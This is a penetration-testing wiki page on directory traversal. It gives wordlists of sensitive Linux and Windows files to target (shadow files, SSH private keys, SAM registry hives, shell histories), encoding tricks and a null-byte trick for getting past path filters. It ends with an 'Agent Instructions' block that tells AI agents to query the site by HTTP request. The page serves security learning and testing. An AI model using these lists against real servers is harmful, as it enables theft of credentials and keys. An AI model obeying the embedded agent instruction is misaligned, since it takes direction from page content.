# Directory Traversal

<mark style="color:orange;">If the web application does not sanitize or uses poor sanitization logic for (file path) parameter input. Then we can include in our own files or traverse files to leak data.</mark>

## Example:

After clicking the “Menu” link, the URL is updated and contains a parameter named file with a value of “current\_menu.php”.

![](/files/-Mcqo_XmJWDvg19HGGkd)

&#x20;The file extension on a parameter value is usually a good indication that we should investigate further because it suggests text or code is being included from a different resource. Most directory traversals are not this obvious but a fair number of old PHP applications load pages in a similar fashion.\
**More examples at:**\
<https://owasp.org/www-community/attacks/Path_Traversal>

{% tabs %}
{% tab title="Simple DirTrav Tests" %}
**Globally readable:**\
Linux: <mark style="color:green;">/etc/passwd</mark>\
Windows: <mark style="color:green;">c:\boot.ini   c:\windows\system32\drivers\etc\hosts  \windows\win.ini</mark> Depending on the web server and app you may need to use forward slashes /
{% endtab %}

{% tab title="Win Process Brute" %}
Using burp or a script you can Brute Force paths by guessing the process numbers:

/proc/\<int>/fd/\<int>\
e.g.\
/proc/2116/fd/11
{% endtab %}

{% tab title="\*nix Paths" %}
*COMMON PATHS:*\
/etc/passwd\
/etc/shadow\
/etc/aliases\
/etc/anacrontab\
/etc/apache2/apache2.conf\
/etc/apache2/httpd.conf\
/etc/at.allow\
/etc/at.deny\
/etc/bashrc\
/etc/bootptab\
/etc/chrootUsers\
/etc/chttp.conf\
/etc/cron.allow\
/etc/cron.deny\
/etc/crontab\
/etc/cups/cupsd.conf\
/etc/exports\
/etc/fstab\
/etc/ftpaccess\
/etc/ftpchroot\
/etc/ftphosts\
/etc/groups\
/etc/grub.conf\
/etc/hosts\
/etc/hosts.allow\
/etc/hosts.deny\
/etc/httpd/access.conf\
/etc/httpd/conf/httpd.conf\
/etc/httpd/httpd.conf\
/etc/httpd/logs/access\_log\
/etc/httpd/logs/access.log\
/etc/httpd/logs/error\_log\
/etc/httpd/logs/error.log\
/etc/httpd/php.ini\
/etc/httpd/srm.conf\
/etc/inetd.conf\
/etc/inittab\
/etc/issue\
/etc/lighttpd.conf\
/etc/lilo.conf\
/etc/logrotate.d/ftp\
/etc/logrotate.d/proftpd\
/etc/logrotate.d/vsftpd.log\
/etc/lsb-release\
/etc/motd\
/etc/modules.conf\
/etc/motd\
/etc/mtab\
/etc/my.cnf\
/etc/my.conf\
/etc/mysql/my.cnf\
/etc/network/interfaces\
/etc/networks\
/etc/npasswd\
/etc/passwd\
/etc/php4.4/fcgi/php.ini\
/etc/php4/apache2/php.ini\
/etc/php4/apache/php.ini\
/etc/php4/cgi/php.ini\
/etc/php4/apache2/php.ini\
/etc/php5/apache2/php.ini\
/etc/php5/apache/php.ini\
/etc/php/apache2/php.ini\
/etc/php/apache/php.ini\
/etc/php/cgi/php.ini\
/etc/php.ini\
/etc/php/php4/php.ini\
/etc/php/php.ini\
/etc/printcap\
/etc/profile\
/etc/proftp.conf\
/etc/proftpd/proftpd.conf\
/etc/pure-ftpd.conf\
/etc/pureftpd.passwd\
/etc/pureftpd.pdb\
/etc/pure-ftpd/pure-ftpd.conf\
/etc/pure-ftpd/pure-ftpd.pdb\
/etc/pure-ftpd/putreftpd.pdb\
/etc/redhat-release\
/etc/resolv.conf\
/etc/samba/smb.conf\
/etc/snmpd.conf\
/etc/ssh/ssh\_config\
/etc/ssh/sshd\_config\
/etc/ssh/ssh\_host\_dsa\_key\
/etc/ssh/ssh\_host\_dsa\_key.pub\
/etc/ssh/ssh\_host\_key\
/etc/ssh/ssh\_host\_key.pub\
/etc/sysconfig/network\
/etc/syslog.conf\
/etc/termcap\
/etc/vhcs2/proftpd/proftpd.conf\
/etc/vsftpd.chroot\_list\
/etc/vsftpd.conf\
/etc/vsftpd/vsftpd.conf\
/etc/wu-ftpd/ftpaccess\
/etc/wu-ftpd/ftphosts\
/etc/wu-ftpd/ftpusers\
/logs/pure-ftpd.log\
/logs/security\_debug\_log\
/logs/security\_log\
/opt/lampp/etc/httpd.conf\
/opt/xampp/etc/php.ini\
/proc/cpuinfo\
/proc/filesystems\
/proc/interrupts\
/proc/ioports\
/proc/meminfo\
/proc/modules\
/proc/mounts\
/proc/stat\
/proc/swaps\
/proc/version\
/proc/self/net/arp\
/root/anaconda-ks.cfg\
/usr/etc/pure-ftpd.conf\
/usr/lib/php.ini\
/usr/lib/php/php.ini\
/usr/local/apache/conf/modsec.conf\
/usr/local/apache/conf/php.ini\
/usr/local/apache/log\
/usr/local/apache/logs\
/usr/local/apache/logs/access\_log\
/usr/local/apache/logs/access.log\
/usr/local/apache/audit\_log\
/usr/local/apache/error\_log\
/usr/local/apache/error.log\
/usr/local/cpanel/logs\
/usr/local/cpanel/logs/access\_log\
/usr/local/cpanel/logs/error\_log\
/usr/local/cpanel/logs/license\_log\
/usr/local/cpanel/logs/login\_log\
/usr/local/cpanel/logs/stats\_log\
/usr/local/etc/httpd/logs/access\_log\
/usr/local/etc/httpd/logs/error\_log\
/usr/local/etc/php.ini\
/usr/local/etc/pure-ftpd.conf\
/usr/local/etc/pureftpd.pdb\
/usr/local/lib/php.ini\
/usr/local/php4/httpd.conf\
/usr/local/php4/httpd.conf.php\
/usr/local/php4/lib/php.ini\
/usr/local/php5/httpd.conf\
/usr/local/php5/httpd.conf.php\
/usr/local/php5/lib/php.ini\
/usr/local/php/httpd.conf\
/usr/local/php/httpd.conf.ini\
/usr/local/php/lib/php.ini\
/usr/local/pureftpd/etc/pure-ftpd.conf\
/usr/local/pureftpd/etc/pureftpd.pdn\
/usr/local/pureftpd/sbin/pure-config.pl\
/usr/local/www/logs/httpd\_log\
/usr/local/Zend/etc/php.ini\
/usr/sbin/pure-config.pl\
/var/adm/log/xferlog\
/var/apache2/config.inc\
/var/apache/logs/access\_log\
/var/apache/logs/error\_log\
/var/cpanel/cpanel.config\
/var/lib/mysql/my.cnf\
/var/lib/mysql/mysql/user.MYD\
/var/local/www/conf/php.ini\
/var/log/apache2/access\_log\
/var/log/apache2/access.log\
/var/log/apache2/error\_log\
/var/log/apache2/error.log\
/var/log/apache/access\_log\
/var/log/apache/access.log\
/var/log/apache/error\_log\
/var/log/apache/error.log\
/var/log/apache-ssl/access.log\
/var/log/apache-ssl/error.log\
/var/log/auth.log\
/var/log/boot\
/var/htmp\
/var/log/chttp.log\
/var/log/cups/error.log\
/var/log/daemon.log\
/var/log/debug\
/var/log/dmesg\
/var/log/dpkg.log\
/var/log/exim\_mainlog\
/var/log/exim/mainlog\
/var/log/exim\_paniclog\
/var/log/exim.paniclog\
/var/log/exim\_rejectlog\
/var/log/exim/rejectlog\
/var/log/faillog\
/var/log/ftplog\
/var/log/ftp-proxy\
/var/log/ftp-proxy/ftp-proxy.log\
/var/log/httpd/access\_log\
/var/log/httpd/access.log\
/var/log/httpd/error\_log\
/var/log/httpd/error.log\
/var/log/httpsd/ssl.access\_log\
/var/log/httpsd/ssl\_log\
/var/log/kern.log\
/var/log/lastlog\
/var/log/lighttpd/access.log\
/var/log/lighttpd/error.log\
/var/log/lighttpd/lighttpd.access.log\
/var/log/lighttpd/lighttpd.error.log\
/var/log/mail.info\
/var/log/mail.log\
/var/log/maillog\
/var/log/mail.warn\
/var/log/message\
/var/log/messages\
/var/log/mysqlderror.log\
/var/log/mysql.log\
/var/log/mysql/mysql-bin.log\
/var/log/mysql/mysql.log\
/var/log/mysql/mysql-slow\.log\
/var/log/proftpd\
/var/log/pureftpd.log\
/var/log/pure-ftpd/pure-ftpd.log\
/var/log/secure\
/var/log/vsftpd.log\
/var/log/wtmp\
/var/log/xferlog\
/var/log/yum.log\
/var/mysql.log\
/var/run/utmp\
/var/spool/cron/crontabs/root\
/var/webmin/miniserv.log\
/var/www/log/access\_log\
/var/www/log/error\_log\
/var/www/logs/access\_log\
/var/www/logs/error\_log\
/var/www/logs/access.log\
/var/www/logs/error.log\
\~/.atfp\_history\
\~/.bash\_history\
\~/.bash\_logout\
\~/.bash\_profile\
\~/.bashrc\
\~/.gtkrc\
\~/.login\
\~/.logout\
\~/.mysql\_history\
\~/.nano\_history\
\~/.php\_history\
\~/.profile\
\~/.ssh/authorized\_keys\
\~/.ssh/id\_dsa\
\~/.ssh/id\_dsa.pub\
\~/.ssh/id\_rsa\
\~/.ssh/id\_rsa.pub\
\~/.ssh/identity\
\~/.ssh/identity.pub\
\~/.viminfo\
\~/.wm\_style\
\~/.Xdefaults\
\~/.xinitrc\
\~/.Xresources\
\~/.xsession
{% endtab %}

{% tab title="Win Paths" %}
Root directory: “  \<partition letter> : \ “\
Directory separator: “ / “ or “ \ ” \
Note that windows allows filenames to be followed by extra `. \ /` characters.\
\
C:/Users/Administrator/NTUser.dat\
C:/Documents and Settings/Administrator/NTUser.dat\
C:/apache/logs/access.log\
C:/apache/logs/error.log\
C:/apache/php/php.ini\
C:/boot.ini\
C:/inetpub/wwwroot/global.asa\
C:/MySQL/data/hostname.err\
C:/MySQL/data/mysql.err\
C:/MySQL/data/mysql.log\
C:/MySQL/my.cnf\
C:/MySQL/my.ini\
C:/php4/php.ini\
C:/php5/php.ini\
C:/php/php.ini\
C:/Program Files/Apache Group/Apache2/conf/httpd.conf\
C:/Program Files/Apache Group/Apache/conf/httpd.conf\
C:/Program Files/Apache Group/Apache/logs/access.log\
C:/Program Files/Apache Group/Apache/logs/error.log\
C:/Program Files/FileZilla Server/FileZilla Server.xml\
C:/Program Files/MySQL/data/hostname.err\
C:/Program Files/MySQL/data/mysql-bin.log\
C:/Program Files/MySQL/data/mysql.err\
C:/Program Files/MySQL/data/mysql.log\
C:/Program Files/MySQL/my.ini\
C:/Program Files/MySQL/my.cnf\
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err\
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log\
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf\
C:/Program Files/MySQL/MySQL Server 5.0/my.ini\
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf\
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf\
C:/Program Files (x86)/Apache Group/Apache/conf/access.log\
C:/Program Files (x86)/Apache Group/Apache/conf/error.log\
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml\
C:/Program Files (x86)/xampp/apache/conf/httpd.conf\
C:/WINDOWS/php.ini\
C:/WINDOWS/Repair/SAM\
C:/Windows/repair/system\
C:/Windows/repair/software\
C:/Windows/repair/security\
C:/WINDOWS/System32/drivers/etc/hosts\
C:/Windows/win.ini\
C:/WINNT/php.ini\
C:/WINNT/win.ini\
C:/xampp/apache/bin/php.ini\
C:/xampp/apache/logs/access.log\
C:/xampp/apache/logs/error.log\
C:/Windows/Panther/Unattend/Unattended.xml\
C:/Windows/Panther/Unattended.xml\
C:/Windows/debug/NetSetup.log\
C:/Windows/system32/config/AppEvent.Evt\
C:/Windows/system32/config/SecEvent.Evt\
C:/Windows/system32/config/default.sav\
C:/Windows/system32/config/security.sav\
C:/Windows/system32/config/software.sav\
C:/Windows/system32/config/system.sav\
C:/Windows/system32/config/regback/default\
C:/Windows/system32/config/regback/sam\
C:/Windows/system32/config/regback/security\
C:/Windows/system32/config/regback/system\
C:/Windows/system32/config/regback/software\
C:/Program Files/MySQL/MySQL Server 5.1/my.ini\
C:/Windows/System32/inetsrv/config/schema/ASPNET\_schema.xml\
C:/Windows/System32/inetsrv/config/applicationHost.config\
C:/inetpub/logs/LogFiles/W3SVC1/u\_ex\[YYMMDD].log
{% endtab %}

{% tab title="Encodings" %}
.    %2e    %u002e

/    %2f    %u2215

\    %5c    %u2216

Mix and match these, ex:

%2e%2e%2f

..%2f
{% endtab %}
{% endtabs %}

## Null Byte:

In many operating systems, null bytes `%00` can be injected to terminate the filename. For example, sending a parameter like:\
?file=secret.doc%00.pdf\
will result in the Java application seeing a string that ends with “.pdf” and the operating system will see a file that ends in “.doc”. Attackers may use this trick to bypass validation routines.

{% hint style="info" %}
Null bytes do not work with PHP >= 5.3.4
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/web-application-hacking/web-techniques/file-and-resource-attacks/directory-traversal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.